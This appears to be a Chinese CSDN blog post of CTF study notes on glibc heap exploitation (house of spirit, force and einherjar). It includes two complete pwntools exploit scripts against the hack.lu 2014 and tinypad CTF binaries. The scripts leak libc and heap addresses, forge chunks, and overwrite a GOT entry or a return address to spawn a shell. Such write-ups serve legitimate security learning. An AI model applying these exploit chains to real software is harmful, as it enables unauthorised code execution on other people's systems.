PWN学习之house of系列

最近 在wiki学习了 house of 这些东西 但是一直都没有找到联系的地方,

然后 在一篇博客上发现了上面有讲东西并且练习题 很好

所以我就拿来联系了一把  并且记录一下 大概思路

house of spirit

 

 

这个wiki上好像没有   但是利用方法其实还是差不多的

这个主要就是 fastbin的利用   伪造一个堆块 然后让  free到这个堆块 让 伪造堆块进入fasebin的里面  然后达到自己想要的结果

然后根据这个博客的例题来增加一下自己的了解

hack.lu 2014 ctf

这个题目 看一下数据结构

 然后看一下ida 的主要逻辑结构

 然后找到 漏洞点

发现name 还有 desc 可以 写很多的地方 这里就可以利用这里来伪造堆块达到 想要的目的。

比如 可以覆盖 list_addr指针   利用这个指针 可以泄露基址 还有free到我们想要的伪造堆块

这道题没有开pie     这里有几个变量

 我们可以把 list_sum  修改成 0x41  (一直add 就可以了)

然后把堆块申请到 a0 哪里 然后可以通过  submit_order 来修改got表 拿到shell

exp 如下

#!/usr/bin/env python
# -*- coding=utf-8 -*-

from pwn import *

context.log_level = "debug"
io = process("./pwn",stdin=PTY)
elf=ELF("./pwn")
libc=elf.libc

def add(name, descrip):
	io.recvuntil("Action:")
	io.sendline("1")
	io.recvuntil("name:")
	io.sendline(name)
	io.recvuntil("description:")
	io.sendline(descrip)

def show():
	io.recvuntil("Action:")
	io.sendline("2")
	io.recvuntil("Name: ")

def dele():
	io.recvuntil("Action:")
	io.sendline("3")

def leave(message):
	io.recvuntil("Action:")
	io.sendline("4")
	io.recvuntil("order: ")
	io.sendline(message)


sscanf_got = 0x804A258
fake_heap = 0x804A2A0

if __name__ =="__main__":
	payload='a'*27+p32(sscanf_got-0x19)

	add(payload,'ppx')
	show()
	io.recvuntil('Name: ')
	sscanf_addr=u32(io.recv(4))
	libc_base_addr=sscanf_addr-libc.sym['__isoc99_sscanf']
	log.success("libc_base_addr "+hex(libc_base_addr))

	for i in range(0x40-1):
		add(chr(i)*5,'ppx')

	payload='a'*27+p32(fake_heap+8)

	add(payload,'ppx')

	payload='\x00'*36+p32(0x41)

	leave(payload)

	dele()

	add('ppx',p32(sscanf_got))
	system_addr=libc.sym['system']+libc_base_addr
	leave(p32(system_addr))

	io.sendline("/bin/sh;")

	io.interactive()
	io.close()

	


house of force

 

这个题 在以前写过 链接

https://blog.csdn.net/qq_41071646/article/details/98492466 

这个堆块利用方法就是 修改top chunks的size  达到任意读/写的功能

house of einherjar

 

这个题目的利用,,

这个利用方法还是和 top chunk  有关系的  然后题目是

2016年Second ctf tinypad

这个题目 其实 让我很头大,,,  在ida 里面看的很恶心,

不过自己运行一遍 然后 再看的话 就逻辑比较明朗了

值得一提的是 这个 题目没有开PIE 但是不能修改got表

可以把计算出one_gadget的地址,然后把ret __libc_start_main  修改成one_gadget的地址

问题就是怎么泄露 基址 还有 heap 的基址

其实这里很好泄露 因为  这里 的dele

 

并没有把用户指针给 清除 那么就可以直接打印出我们free 掉的堆块值的指针,,

这个很好写  其中我自己写的时候  先dele的 3  导致堆块的基址 没有办法泄露

然后 堆块的的大小  我一开始也是很随意的定义,

发现了  第二个堆块 必须 0xf0 或者 0xf8

然后这里 原因感觉有点迷糊,,

然后 其它就很好说了  伪造堆块 到 tinypad 

其它都是一把梭了

下面是 exp

#!/usr/bin/env python2
# -*- coding=utf-8 -*-

from pwn import *

io=process("./pwn")
elf=ELF("./pwn")
libc=elf.libc

context.log_level='debug'

def add(size, content):
	io.readuntil("(CMD)>>>")
	io.sendline("a")
	io.readuntil("(SIZE)>>>")
	io.sendline(str(size))
	io.readuntil("(CONTENT)>>>")
	io.sendline(content)

def dele(index):
	io.readuntil("(CMD)>>>")
	io.sendline("d")
	io.readuntil("(INDEX)>>>")
	io.sendline(str(index))

def edit(index, content):
	io.readuntil("(CMD)>>>")
	io.sendline("e")
	io.readuntil("(INDEX)>>>")
	io.sendline(str(index)) 
	io.readuntil("(CONTENT)>>>")
	io.sendline(content)
	io.readuntil("(Y/n)>>>")
	io.sendline("y")


if __name__ =="__main__":
	add(0xe0,'a'*10)
	add(0xf8,'b'*0xf0)
	add(0x100,'c'*0xf0)
	add(0x100,'d'*10)
	dele(3)
	dele(1)

	io.recvuntil("INDEX: 1")
	io.recvuntil("CONTENT: ")
	heap_base=u64(io.recvline().rstrip().ljust(8,'\x00'))-0x1f0
	log.success("heap_base "+hex(heap_base))


	io.recvuntil("INDEX: 3")
	io.recvuntil("CONTENT: ")
	main_arena=u64(io.recv(6).ljust(8,'\x00'))
	libc_base_addr=main_arena-88-0x3C4B20
	gadget_addr=libc_base_addr+0x45216
	log.success("libc_base_addr "+hex(libc_base_addr))

	offest_size=heap_base+0xf0-0x602040
	print hex(offest_size)

	payload='f'*0xe0+p64(offest_size)
	add(0xe8,payload)
	#gdb.attach(io)
	#pause()

	dele(4)
	#dele(3)

	payload=p64(0x100) + p64(offest_size) + p64(0x602040)*4

	edit(2,payload)
	#gdb.attach(io)
	#pause()
	dele(2)

	add(0xe0,'e'*0xd0)
	#gdb.attach(io)
	#pause()
	payload = p64(0xe8) + p64(libc_base_addr + libc.symbols["__environ"])
	payload += p64(0xe8) + p64(0x602148)

	add(0x100,payload)

	io.recvuntil("# CONTENT: ")
	stack_env =u64(io.recv(6).ljust(8,'\x00'))

	edit(2, p64(stack_env-240))
	edit(1, p64(gadget_addr))

	io.recvuntil("(CMD)>>>")
	io.sendline("Q")

	#gdb.attach(io)
	#pause()
	#print io.recv()


	io.interactive()
	io.close()



	

再次感谢 下面链接的作者

 

下面的目标是 看0days 的书 希望能复现一些 CVE

 

参考链接

https://paper.seebug.org/521/#house-of-spirit

  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

打赏
文章很值,打赏犒劳作者一下
相关推荐
©️2020 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页

打赏

pipixia233333

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者